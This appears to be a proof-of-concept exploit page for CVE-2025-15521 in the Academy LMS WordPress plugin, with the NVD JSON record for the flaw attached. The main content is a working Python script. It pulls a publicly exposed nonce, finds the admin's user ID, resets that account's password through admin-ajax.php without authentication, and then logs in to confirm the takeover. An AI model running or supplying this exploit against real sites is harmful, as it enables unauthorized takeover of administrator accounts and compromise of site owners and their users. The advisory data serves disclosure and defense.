CVE-2025-15521

import requests import re target = "http://target-wordpress-site.com" username = "admin" # Target username to takeover # Step 1: Get the publicly exposed nonce from the plugin session = requests.Session() # Get homepage to extract nonce resp = session.get(f"{target}/") # Academy LMS exposes nonce in its AJAX handlers or forms nonce_match = re.search(r'action":"academy_reset_password"[^}]*nonce":"([a-zA-Z0-9]+)', resp.text) if not nonce_match: # Alternative: Try to get nonce from login page resp = session.get(f"{target}/wp-login.php?action=lostpassword") nonce_match = re.search(r'_wpnonce" value="([a-zA-Z0-9]+)', resp.text) nonce = nonce_match.group(1) if nonce_match else None # Step 2: Get user ID for target username user_resp = session.get(f"{target}/wp-json/wp/v2/users?search={username}") user_id = user_resp.json()[0]['id'] if user_resp.json() else None # Step 3: Exploit the vulnerability - reset password if nonce and user_id: exploit_data = { 'action': 'academy_reset_password', 'user_id': str(user_id), 'new_password': 'P@ssw0rd123!', 'nonce': nonce, 're_new_password': 'P@ssw0rd123!' } exploit_resp = session.post( f"{target}/wp-admin/admin-ajax.php", data=exploit_data, headers={'Content-Type': 'application/x-www-form-urlencoded'} ) print(f"Exploit Status: {exploit_resp.status_code}") print(f"Response: {exploit_resp.text}") # Step 4: Login with new password login_data = { 'log': username, 'pwd': 'P@ssw0rd123!', 'wp-submit': 'Log In' } login_resp = session.post( f"{target}/wp-login.php", data=login_data, allow_redirects=True ) if 'wordpress_logged_in' in str(session.cookies): print("[+] Account takeover successful!") else: print("[-] Login failed")

{"cve": {"id": "CVE-2025-15521", "sourceIdentifier": "[email protected]", "published": "2026-01-21T02:15:48.363", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Academy LMS – WordPress LMS Plugin for Complete eLearning Solution plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.5.0. This is due to the plugin not properly validating a user's identity prior to updating their password and relying solely on a publicly-exposed nonce for authorization. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and gain access to their account."}, {"lang": "es", "value": "El plugin The Academy LMS – WordPress LMS Plugin para Complete eLearning Solution para WordPress es vulnerable a escalada de privilegios a través de la toma de control de cuentas en todas las versiones hasta la 3.5.0, inclusive. Esto se debe a que el plugin no valida correctamente la identidad de un usuario antes de actualizar su contraseña y se basa únicamente en un nonce expuesto públicamente para la autorización. Esto hace posible que atacantes no autenticados cambien la contraseña de cualquier usuario, incluidos los administradores, y obtengan acceso a su cuenta."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/academy/tags/3.5.0/includes/functions.php#L1581", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6687ebbe-fdf4-4ecb-bf59-034bb4b0104c?source=cve", "source": "[email protected]"}]}}